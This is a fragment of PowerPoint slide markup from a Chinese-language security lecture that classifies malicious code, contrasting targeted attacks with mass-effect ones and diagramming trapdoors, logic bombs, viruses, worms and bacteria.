            <a:pPr marL="814070" lvl="1" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>定点攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1252220" lvl="2" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>邮件、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、域名、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1252220" lvl="2" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器列表、特定人员名单等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1865" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1252220" lvl="2" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1865" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="814070" lvl="1" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>群体性杀伤</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2265" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1252220" lvl="2" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1865" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>挂马攻击、钓鱼攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1865" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1252220" lvl="2" indent="-342900" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1865" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>病毒、蠕虫自动扩散</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1865" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs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恶意代码形式</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050631" name="Oval 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8460105" y="781685"/>
            <a:ext cx="1318260" cy="1255395"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广义上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050632" name="Oval 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5877560" y="2316480"/>
            <a:ext cx="1405255" cy="1341120"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>狭义上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050633" name="Line 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5627585" y="2904932"/>
            <a:ext cx="249975" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050634" name="Line 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7141846" y="1365249"/>
            <a:ext cx="1318259" cy="198402"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="圆角矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045A6EBE-7B89-8D39-AAE5-FCB48DB42744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5707658" y="1215989"/>
            <a:ext cx="1447800" cy="666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文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BDBA970-90B4-48F9-2259-354A695CC324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5877560" y="1365250"/>
            <a:ext cx="1107996" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="圆角矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F724BA87-2EFA-9E38-A23C-32273A248A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3521490" y="2509927"/>
            <a:ext cx="1910656" cy="6064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文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A953C5EF-F7F5-262B-78BF-C453631A726E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3675156" y="2658636"/>
            <a:ext cx="1603324" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>依赖主机程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="圆角矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D35B0C7-95CF-7B75-E297-171DE2BCE9C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10041515" y="3488907"/>
            <a:ext cx="876675" cy="666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16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BEABCC2-0C83-908D-661E-5F7D6CD3BBFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10156686" y="3651564"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>细菌</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="圆角矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BD059DB-14DA-2204-A488-AD235848588A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047954" y="3629688"/>
            <a:ext cx="1050862" cy="666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文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E51556-5CB6-27E9-C4E8-415800C4BBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273069" y="3767889"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="圆角矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2388A26-4EF6-74C5-F5DF-7F6FE14BBFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8253364" y="3498219"/>
            <a:ext cx="962048" cy="666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文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F8E1F6-9BF7-FE04-D3FD-75B30F03B34A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8423266" y="3647480"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="圆角矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D10024BA-D7EC-5665-9E06-B8A74EDFCF21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2475629" y="3571960"/>
            <a:ext cx="1050862" cy="666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BD329568-D9CD-CC32-F2F5-586F21F49850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682165" y="3754317"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>陷门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="圆角矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D32CB8-788D-2678-4F74-A9A3840A2EBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426703" y="4820836"/>
            <a:ext cx="1447800" cy="666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文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{608CBBA8-0737-41BD-C9A6-0D37DDB2E76E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2622048" y="5003193"/>
            <a:ext cx="1107996" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>逻辑炸弹</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="圆角矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
